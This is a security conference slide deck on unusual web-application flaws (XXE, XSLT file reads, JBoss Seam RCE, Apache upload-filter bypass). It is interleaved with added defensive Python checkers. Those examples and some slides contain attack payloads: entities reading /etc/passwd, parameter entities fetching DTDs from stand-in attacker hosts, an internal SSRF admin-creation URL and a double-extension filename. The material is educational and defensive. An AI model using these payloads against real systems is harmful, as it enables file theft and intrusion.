Unusual security problems in web applications.
Michał Sajdak, CISSP, CEH, F2B
securitum.pl
sekurak.pl
rozwal.to
About me
Michał Sajdak <at> securitum.pl
Pentester
Instructor (security trainings)
sekurak.pl founder
rozwal.to founder
Copyright 2014 Securitum
www.securitum.pl
Agenda
Vulnerabilities in Nuxeo
First public disclosure
(Maybe?) not so obvious path traversal(s)
OS code exec
XXE
JBoss Seam nice RCE
RCE through XSLT transformation (if we have time)
PHP shell upload – filter bypassing (if we have time)
Educational use only
Nuxeo
Content Management Platform for the
Software-Defined Enterprise
Nuxeo
The RPM (Release and Preservation Management)
Department at EA uses the Nuxeo Platform to manage video
game builds at all stages of the development lifecycle
Using the Nuxeo Platform as a core server, Jeppesen, a Boeing
company, syncs flight bag information to iPads for pilots
across the world.
Nuxeo
The Nuxeo Platform, offering strong support for SSO, along
with a flexible content management platform, is the perfect
addition to the US Navy’s application portfolio.
Orange manages communication with its mobile
telecommunications and broadband internet provider clients
through a secure extranet portal built on the Nuxeo Platform.
Nuxeo
History
Bug patched this year (February)
Reported by Michal Bentkowski & Sebastian Gilon from
securitum.pl
https://doc.nuxeo.com/display/ADMINDOC/Nuxeo+Security+Update+-+2015-02-27+-+Critical
No details disclosed
DEMO
Nuxeo – reporting history
Securitum:
Hey, you got some nasty bugs in your platform. Here are the details.
Nuxeo:
Cool, these are definitely nice bugs! We’ll prepare a patch soon!
BTW: do you want something for reporting the bug?
Securitum:
no :-)
Nuxeo:
Do you drink from time to time?
Securitum:
Sometimes :P
Nuxeo:
Cool, we are sending 2 crates of wine to Poland
Nice bug bounty
XXE (XML eXternal Entities)
XXE has been known for a while
But many many applications are vulnerable by
default
BTW: XXE tests are available only in the latest
versions of Burp Suite
(a very popular web pentesting tool)
XXE (XML eXternal Entities)
HTML entities
&lt; or &#60; (both render as <)
&quot;
&apos;
&amp;
&micro;
…
Or:
&entity_name;
&#entity_number;
HTML entities
Similar in XML…
XXE (XML eXternal Entities)
… but we can define our own entities
<!ENTITY name "value">
XXE (XML eXternal Entities)
Can we only read files?
No :P
Making HTTP requests
Transferring files to your server (blind XXE)
Making requests to 127.0.0.1
Some of these are unauthenticated?
Scanning backend infrastructure
Services with no auth check, etc.
http://10.0.0.75:8080/usrMgmt/add/admin2/admin2
XXE (XML eXternal Entities)
Actually, we can often exploit XXE even when no tag is
displayed (!)
i.e. it is enough that the XML parser starts.
Parameter entities
They can be used only in the DOCTYPE
<!ENTITY % name "entity_value">
sekurak.pl/data/ccc
More info: sekurak.pl/tag/xxe/
XXE (XML eXternal Entities)
Can we only read files?
No :P
Making http requests
Transferring files to your server (blind XXE)
The firewall must allow outgoing HTTP communication
Making requests to 127.0.0.1
Some of these are unauthenticated?
Scanning backend infrastructure
Services with no auth check, etc.
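Added example (Python, not from the deck) for the parameter-entity and blind XXE points above: it lists the DOCTYPE constructs in an untrusted document without resolving any of them, then applies the defender's rule of rejecting every DOCTYPE outright. The sample documents and the host name collector.invalid are constructed.

```python
from dataclasses import dataclass, field
from typing import List, Optional
import xml.parsers.expat as expat

@dataclass
class EntityDecl:
    name: str
    is_parameter: bool        # declared as <!ENTITY % name ...>, DOCTYPE-only
    system_id: Optional[str]  # SYSTEM "..." target; None for internal entities
    value: Optional[str]      # replacement text of internal entities

@dataclass
class XmlReport:
    has_doctype: bool = False
    external_subset: Optional[str] = None  # <!DOCTYPE x SYSTEM "..."> target
    entities: List[EntityDecl] = field(default_factory=list)

    def findings(self) -> List[str]:
        """XXE-relevant constructs in the DOCTYPE; empty for harmless documents."""
        out = []
        if self.external_subset:
            out.append(f"external DTD subset: {self.external_subset}")
        for e in self.entities:
            if e.is_parameter:
                # Parameter entities never show in element content; their side
                # effect (file read, outbound request) happens during DTD parsing.
                target = e.system_id if e.system_id is not None else "internal"
                out.append(f"parameter entity %{e.name}; -> {target}")
            elif e.system_id is not None:
                out.append(f"external general entity &{e.name}; -> {e.system_id}")
        return out

def inspect_xml(data: bytes) -> XmlReport:
    """Record DOCTYPE and entity declarations without resolving any of them.

    expat fetches external resources only when an ExternalEntityRefHandler is
    installed and parameter-entity parsing is enabled; neither happens here.
    """
    report = XmlReport()
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        report.has_doctype = True
        report.external_subset = system_id

    def on_entity(name, is_pe, value, base, system_id, public_id, notation):
        report.entities.append(EntityDecl(name, bool(is_pe), system_id, value))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)
    return report

class UnsafeXml(ValueError):
    pass

def parse_untrusted(data: bytes) -> str:
    """Defender's rule: XML from outside gets no DOCTYPE at all; rejecting every
    DOCTYPE is simpler than telling harmless internal entities from dangerous
    ones. Returns the root element name of accepted documents."""
    report = inspect_xml(data)
    if report.has_doctype:
        detail = report.findings() or ["internal DTD only"]
        raise UnsafeXml("DOCTYPE rejected: " + "; ".join(detail))
    tags: List[str] = []
    parser = expat.ParserCreate()
    parser.StartElementHandler = lambda tag, attrs: tags.append(tag)
    parser.Parse(data, True)
    return tags[0]

def rejected(data: bytes) -> bool:
    """True when parse_untrusted refuses the document."""
    try:
        parse_untrusted(data)
        return False
    except UnsafeXml:
        return True

# Constructed sample documents (not from the slides).
BENIGN = b'<?xml version="1.0"?><order><id>42</id></order>'
# Classic file read: external general entity referenced in element content.
FILE_READ = b'''<!DOCTYPE order [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<order><id>&xxe;</id></order>'''
# Blind variant: a parameter entity pulls an external DTD while the DOCTYPE is
# parsed; nothing is echoed back, the outbound request is the whole effect.
BLIND = b'''<!DOCTYPE order [
  <!ENTITY % ext SYSTEM "http://collector.invalid/evil.dtd">
  %ext;
]>
<order><id>1</id></order>'''
# Internal entity only: harmless, but still a DOCTYPE we do not accept.
INTERNAL = b'''<!DOCTYPE order [ <!ENTITY vendor "Securitum"> ]>
<order><vendor>&vendor;</vendor></order>'''
```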
XXE (XML eXternal Entities)
DEMO
XSLT
XSLT (Extensible Stylesheet Language
Transformations) is a language for:
transforming XML documents into other XML
documents or other formats such
as HTML for web pages, plain text
© wikipedia
XSLT
Commonly used for custom styling in web
apps
XML (db generated) + XSLT (user provided styles)
= nice HTML
= nice PDF
etc.
XSLT
We can have a problem when a user
(i.e. an attacker) can provide an XSL file to be parsed
server side
Example: custom desktop in a web app
Example: print templates
…
XSLT
Java…
XSLT
PHP
Doesn’t work by default…
But reading files does:
<xsl:template match="/">
<xsl:copy-of select="document('/etc/passwd')"/>
</xsl:template>
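Added example (Python, not from the deck): a pre-check for user-supplied stylesheets before they reach a server-side XSLT processor. It flags the document() read shown above for PHP, xsl:include/xsl:import of external stylesheets, and any call through an extension namespace, which is the general route from XSLT into host-language code. The sample stylesheets, including the deliberately harmless php:function('ucfirst') call, are constructed.

```python
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

XSLT_NS = "http://www.w3.org/1999/XSL/Transform"
XHTML_NS = "http://www.w3.org/1999/xhtml"
ALLOWED_NS = {"", XSLT_NS, XHTML_NS}          # pure XSLT 1.0 plus literal (X)HTML output
XPATH_ATTRS = {"select", "test", "match", "use"}  # attributes holding XPath expressions
# document() pulls in another resource; a prefixed call such as php:function()
# leaves the XSLT language and reaches into the processor's host environment.
RISKY_CALL = re.compile(
    r"(?:^|[^\w.:-])(document)\s*\(|([A-Za-z_][\w.-]*):([A-Za-z_][\w.-]*)\s*\("
)

def split_tag(tag: str) -> Tuple[str, str]:
    """ElementTree names look like '{ns}local'; return (ns, local)."""
    if tag.startswith("{"):
        ns, local = tag[1:].split("}", 1)
        return ns, local
    return "", tag

def audit_stylesheet(xsl: bytes) -> List[str]:
    """Return a list of reasons to refuse the stylesheet; empty means acceptable."""
    findings: List[str] = []
    root = ET.fromstring(xsl)
    if split_tag(root.tag) not in ((XSLT_NS, "stylesheet"), (XSLT_NS, "transform")):
        findings.append("root element is not xsl:stylesheet")
    for el in root.iter():
        ns, local = split_tag(el.tag)
        if ns not in ALLOWED_NS:
            findings.append(f"element in non-allowed namespace: {ns}")
        if ns == XSLT_NS and local in ("include", "import"):
            findings.append(f"xsl:{local} loads an external stylesheet: {el.get('href')}")
        for attr, value in el.attrib.items():
            ans, alocal = split_tag(attr)
            if ans not in ALLOWED_NS:
                findings.append(f"attribute in non-allowed namespace: {ans}")
            if alocal not in XPATH_ATTRS:
                continue
            for m in RISKY_CALL.finditer(value):
                if m.group(1):
                    findings.append(f"document() call in {alocal}: {value}")
                else:
                    findings.append(f"extension call {m.group(2)}:{m.group(3)}() in {alocal}")
    return findings

# Constructed sample stylesheets (not from the slides).
SAFE = b'''<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <html><body><h1><xsl:value-of select="/report/title"/></h1></body></html>
  </xsl:template>
</xsl:stylesheet>'''
# The file read from the PHP slide.
FILE_READ = b'''<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:copy-of select="document('/etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>'''
# A call through PHP's extension namespace; the function is harmless on
# purpose, the point is that any prefixed call is refused.
EXTENSION = b'''<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  xmlns:php="http://php.net/xsl">
  <xsl:template match="/">
    <xsl:value-of select="php:function('ucfirst', string(/report/title))"/>
  </xsl:template>
</xsl:stylesheet>'''
REMOTE_INCLUDE = b'''<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:include href="http://collector.invalid/extra.xsl"/>
</xsl:stylesheet>'''
```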
OS Command Exec – JBoss Seam
An example of the following problem:
We deploy an app which uses library X
After some time… vulnerabilities are found in the used library
Info: Meder Kydyraliev, Seam Vulnerability,
http://blog.o0o.nu/
OS Command Exec – JBoss Seam
There is a vulnerability (or several) in JBoss Seam
which allows you to execute OS commands
No auth needed
No specific conditions needed
The only requirement: the app uses a
vulnerable version of the library
DEMO
Upload / Apache – filter bypassing
Commonly used methods:
File extension blacklisting
i.e. no .php / .jsp / etc. can be uploaded
Checking file structure
i.e. whether the uploaded file is a real image / PDF / etc.
Upload / Apache – filter bypassing
Interesting fact
How many Apache servers will interpret the
following file:
test.jpg.php.wnk2j3.tralalala.sekurak
as txt?
as php?
as jpg?
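Added example (Python, not from the deck): the last-extension blacklist from the slide beside an allow-list check that treats every dot-separated segment as an extension, because Apache's mod_mime reads all extensions of a multi-extension name and a .php mapped with AddHandler wins wherever it sits. The file name is the one from the slide; the header bytes and the stored-name scheme are constructed.

```python
import os
import secrets
from typing import Tuple

# Extensions the slide names as typically blacklisted. Real lists are much
# longer, which is exactly why a blacklist is a poor primary control.
EXECUTABLE = {"php", "jsp"}
# Final extensions the endpoint accepts, with the signature each must carry.
ALLOWED = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "pdf": b"%PDF-",
}

def last_extension_blacklist(filename: str) -> bool:
    """The weak filter from the slides: look only at the final extension."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in EXECUTABLE

def check_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Allow-list filter: every dot-separated segment is treated as an extension.

    mod_mime evaluates all extensions of a name, so an executable extension
    anywhere in it has to be rejected, not only one at the end. The signature
    check implements the slide's second method (file structure); it is an
    extra layer, not a substitute, since a valid image can still carry
    embedded text.
    """
    base = os.path.basename(filename.replace("\\", "/"))  # strip any path part
    parts = base.lower().split(".")
    if len(parts) < 2 or not all(parts):
        return False, "missing extension or empty name segment"
    executable = EXECUTABLE.intersection(parts[1:])
    if executable:
        return False, "executable extension inside name: " + ", ".join(sorted(executable))
    ext = parts[-1]
    if ext not in ALLOWED:
        return False, f"extension .{ext} not on the allow list"
    if not data.startswith(ALLOWED[ext]):
        return False, f"content does not carry the .{ext} signature"
    return True, "ok"

def stored_name(filename: str) -> str:
    """Name used on disk: random stem plus the checked extension. Nothing from
    the user's name survives, so the web server sees exactly one extension."""
    ext = filename.rsplit(".", 1)[-1].lower()
    if ext not in ALLOWED:
        raise ValueError("check_upload must pass before storing")
    return f"{secrets.token_hex(16)}.{ext}"

# Constructed sample content: minimal JPEG header bytes and a PHP text file.
JPEG_HEADER = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 16
PHP_TEXT = b"<?php echo 'not an image'; ?>"
SLIDE_NAME = "test.jpg.php.wnk2j3.tralalala.sekurak"

if __name__ == "__main__":
    print("weak filter accepts slide name:", last_extension_blacklist(SLIDE_NAME))
    for name, content in [(SLIDE_NAME, JPEG_HEADER), ("shell.php.jpg", JPEG_HEADER),
                          ("photo.jpg", PHP_TEXT), ("photo.jpg", JPEG_HEADER)]:
        print(name, check_upload(name, content))
```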
What’s next?
DotNetNuke: full unauthenticated admin
TP-Link devices
Two new methods for gaining OS root
One is sort of universal: works on old and new devices
Disclosure on sekurak.pl ~soon
Q&A ?
Questions?
Contact: michal.sajdak@securitum.pl
http://securitum.pl/
http://sekurak.pl/
http://rozwal.to/
CONFidence 2015: Unusual security problems in web applications - Michał Sajdak

  • 8. Nuxeo – reporting history
    Securitum: Hey, you got some nasty bugs in your platform. Here are the details.
    Nuxeo: Cool, these are definitely nice bugs! We’ll prepare a patch soon! BTW: do you want something for reporting the bug?
    Securitum: no :-)
    Nuxeo: Do you drink from time to time?
    Securitum: Sometimes :P
    Nuxeo: Cool, we are sending 2 crates of wine to Poland
  • 10. XXE (XML eXternal Entities)
    XXE has been known for a while, but many, many applications are vulnerable by default.
    BTW: XXE tests are available only in the latest versions of Burp Suite (a very popular web pentesting tool).
  • 11. XXE (XML eXternal Entities)
    HTML entities: &lt; or &#60; for <, &quot;, &apos;, &amp;, &micro;, …
    Or, in general: &entity_name; &#entity_number;
  • 12. HTML entities
    Similar in XML…
  • 13. XXE (XML eXternal Entities)
    … but we can define our own entities: <!ENTITY name "value">
  • 16. XXE (XML eXternal Entities)
    We can only read files? No :P
    Making HTTP requests
    Transferring files to your server (blind XXE)
    Making requests to 127.0.0.1 – some of these are unauthenticated?
    Scanning backend infrastructure – services with no auth check, etc.
    http://10.0.0.75:8080/usrMgmt/add/admin2/admin2
  • 17. XXE (XML eXternal Entities)
    Actually we can often exploit XXE even when no tag is displayed (!), i.e. as soon as the XML parser starts.
    Parameter entities can be used only in the DOCTYPE: <!ENTITY % name "entity_value">
  • 19. XXE (XML eXternal Entities)
    Can we only read files? No :P
    Making HTTP requests
    Transferring files to your server (blind XXE) – the firewall must allow outgoing HTTP communication
    Making requests to 127.0.0.1 – some of these are unauthenticated?
    Scanning backend infrastructure – services with no auth check, etc.
  • 20. XXE (XML eXternal Entities) – DEMO
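As an added example (not code from the talk or from Nuxeo), a defender-side triage in Python: it lists the external general and parameter entities declared in a DOCTYPE, maps each target onto the abuse classes from slides 16 and 19, and refuses any DTD before the document reaches a parser. The sample document, the attacker.example host and the loopback URL are constructed.

```python
"""Defender-side XXE triage for untrusted XML (added example, not code from
the talk or from Nuxeo)."""
import re
from xml.etree import ElementTree as ET

# One external entity declaration: optional '%' (parameter entity), a name,
# then SYSTEM "uri" or PUBLIC "pubid" "uri". Internal entities such as
# <!ENTITY name "value"> carry no URI and are deliberately not matched.
_EXTERNAL_ENTITY = re.compile(
    r'<!ENTITY\s+(%\s+)?([\w.\-]+)\s+'
    r'(?:SYSTEM\s+|PUBLIC\s+"[^"]*"\s+)(["\'])(.*?)\3', re.S)

def find_external_entities(doc):
    """Return [(kind, name, uri)] for every external general or parameter
    entity declared in the document's DOCTYPE."""
    return [("parameter" if m.group(1) else "general", m.group(2), m.group(4))
            for m in _EXTERNAL_ENTITY.finditer(doc)]

def classify_target(uri):
    """Map an entity target onto the XXE uses listed on slides 16 and 19."""
    if uri.startswith("file:"):
        return "local file read"
    if re.match(r"https?://(127\.|localhost|10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)", uri):
        return "request to internal host (SSRF)"
    if uri.startswith(("http://", "https://", "ftp://")):
        return "outbound request (blind XXE / exfiltration)"
    return "other"

def parse_untrusted(doc):
    """Parse XML from an untrusted source. Any DTD is rejected outright, which
    disables general and parameter entities alike (the defusedxml library's
    forbid_dtd option takes the same approach)."""
    if "<!DOCTYPE" in doc:
        raise ValueError("DTD in untrusted XML is not allowed")
    return ET.fromstring(doc)

# Constructed sample, not from the talk: an internal entity (harmless), a
# file-read entity, a parameter entity fetching a remote DTD (blind XXE) and
# a reference to a service on the loopback interface.
SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY greeting "hello">
  <!ENTITY passwd SYSTEM "file:///etc/passwd">
  <!ENTITY % remote SYSTEM "http://attacker.example/evil.dtd">
  <!ENTITY svc SYSTEM "http://127.0.0.1:8080/internal/">
]>
<data>&passwd;</data>"""
```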
  • 21. XSLT
    XSLT (Extensible Stylesheet Language Transformations) is a language for transforming XML documents into other XML documents or other formats such as HTML for web pages, plain text © wikipedia
  • 22. XSLT
    Commonly used for custom styling in web apps: XML (DB generated) + XSLT (user-provided styles) = nice HTML, nice PDF, etc.
  • 24. XSLT
    We can have a problem when a user (i.e. an attacker) can provide an XSL file to be parsed on the server side.
    Example: custom desktop in a web app. Example: print templates …
  • 26. XSLT
    PHP: doesn’t work by default… but reading files does:
    <xsl:template match="/"> <xsl:copy-of select="document('/etc/passwd')"/> </xsl:template>
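As an added example (not the presenter's or any project's code), a Python pre-check that audits a user-supplied stylesheet before a server-side XSLT engine runs it: it flags the document() file read from slide 26, xsl:include/xsl:import, and extension function calls such as php:function(). The sample stylesheet is constructed.

```python
"""Pre-flight audit of a user-supplied XSL stylesheet before a server-side XSLT
engine runs it (added example, not code from the talk)."""
import re
from xml.etree import ElementTree as ET

XSL_NS = "http://www.w3.org/1999/XSL/Transform"
# Attributes that carry XPath expressions or resource references.
XPATH_ATTRS = ("select", "test", "match", "use", "href")
# XSLT functions that read arbitrary server-side or remote resources.
RESOURCE_FUNCS = ("document(", "unparsed-text(", "unparsed-text-lines(")
# prefix:name( is an extension function call; XPath axes use '::' so do not match.
_EXT_CALL = re.compile(r"(?<![\w:])([\w.\-]+:[\w.\-]+)\s*\(")

def _split_tag(tag):
    """Split ElementTree's '{ns}local' form into (ns, local)."""
    ns, _, local = tag[1:].partition("}") if tag.startswith("{") else ("", "", tag)
    return ns, local

def audit_stylesheet(xsl_text):
    """Return (issue, detail) findings; empty means only core XSLT is used."""
    findings = []
    for el in ET.fromstring(xsl_text).iter():
        ns, local = _split_tag(el.tag)
        if ns == XSL_NS and local in ("include", "import"):
            findings.append(("external stylesheet", el.get("href", "")))
        elif ns and ns != XSL_NS:
            findings.append(("extension element", el.tag))
        for attr in XPATH_ATTRS:
            value = el.get(attr) or ""
            for func in RESOURCE_FUNCS:
                if func in value:
                    findings.append(("resource read via " + func[:-1], value))
            for call in _EXT_CALL.findall(value):
                findings.append(("extension function call", call))
    return findings

# Constructed sample: the /etc/passwd read from slide 26 plus a call through
# PHP's XSL extension namespace (a real namespace, used here as an example).
SAMPLE_XSL = """<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
  <xsl:template match="/">
    <xsl:copy-of select="document('/etc/passwd')"/>
    <xsl:value-of select="php:function('phpversion')"/>
  </xsl:template>
</xsl:stylesheet>"""
```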
  • 27. OS Command Exec – JBoss Seam
    But it is also an example of the following problem: we deploy an app which uses library X; after some time… vulnerabilities in the used lib.
    Info: Meder Kydyraliev, Seam Vulnerability, http://blog.o0o.nu/
  • 28. OS Command Exec – JBoss Seam
    There is (are) a vulnerability in JBoss Seam which allows you to exec OS code. No auth needed. No specific condition needed. The only requirement: the app is using the vulnerable version of the lib.
    DEMO
  • 29. Upload / Apache – filter bypassing
    Commonly used methods:
    File extension blacklisting, i.e. no .php / .jsp / etc. can be uploaded
    Checking file structure, i.e. whether the uploaded file is a real image / PDF / etc.
  • 30. Upload / Apache – filter bypassing
    Interesting fact: how many Apache servers will interpret the following file, test.jpg.php.wnk2j3.tralalala.sekurak, as txt? as php? as jpg?
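As an added example (not from the talk), Python upload validation that applies the two methods from slide 29 correctly and walks the filename the way Apache mod_mime does, so a handler extension anywhere in the name is caught. The handler-extension set and the JPEG header bytes are constructed, and the mod_mime rule (every dot-separated part is an extension, parts with no mapping are ignored) is assumed from Apache's documented behaviour.

```python
"""Upload filename validation that accounts for Apache's multi-extension
handling (added example, not code from the talk)."""
import os
import secrets

# Constructed config: extensions the web server hands to a script engine
# (what AddHandler/AddType would register).
SERVER_HANDLED = {"php", "php3", "php5", "phtml", "jsp", "cgi"}
# Accepted types with the magic bytes a genuine file starts with (the
# structure check from slide 29).
ALLOWED = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
    "pdf": (b"%PDF-",),
}

def mod_mime_extensions(filename):
    """Extensions as Apache mod_mime sees them (assumed, documented
    behaviour): every dot-separated part after the first counts, and parts
    with no mapping are ignored, so a handler extension in the middle of
    the name is still honoured."""
    return [p.lower() for p in os.path.basename(filename).split(".")[1:] if p]

def blacklist_check(filename):
    """The weak method from slide 29: only the final extension is inspected."""
    return filename.rsplit(".", 1)[-1].lower() not in SERVER_HANDLED

def validate_upload(filename, head):
    """Refuse a handler extension anywhere in the name, require exactly one
    allow-listed extension and verify the magic bytes. Returns the extension
    to store the file under, or None."""
    exts = mod_mime_extensions(filename)
    if any(e in SERVER_HANDLED for e in exts):
        return None
    if len(exts) != 1 or exts[0] not in ALLOWED:
        return None
    if not any(head.startswith(magic) for magic in ALLOWED[exts[0]]):
        return None
    return exts[0]

def stored_name(ext):
    """Never reuse the client's name: random name plus one known extension."""
    return secrets.token_hex(16) + "." + ext

# Constructed sample bytes: the start of a JPEG (JFIF) file.
JPEG_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF"
```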
  • 32. What’s next?
    dotnetnuke – full unauth admin
    TP-Link devices: two new methods for gaining OS root; one sort of universal – works in old/new devices
    Disclosure on sekurak.pl ~soon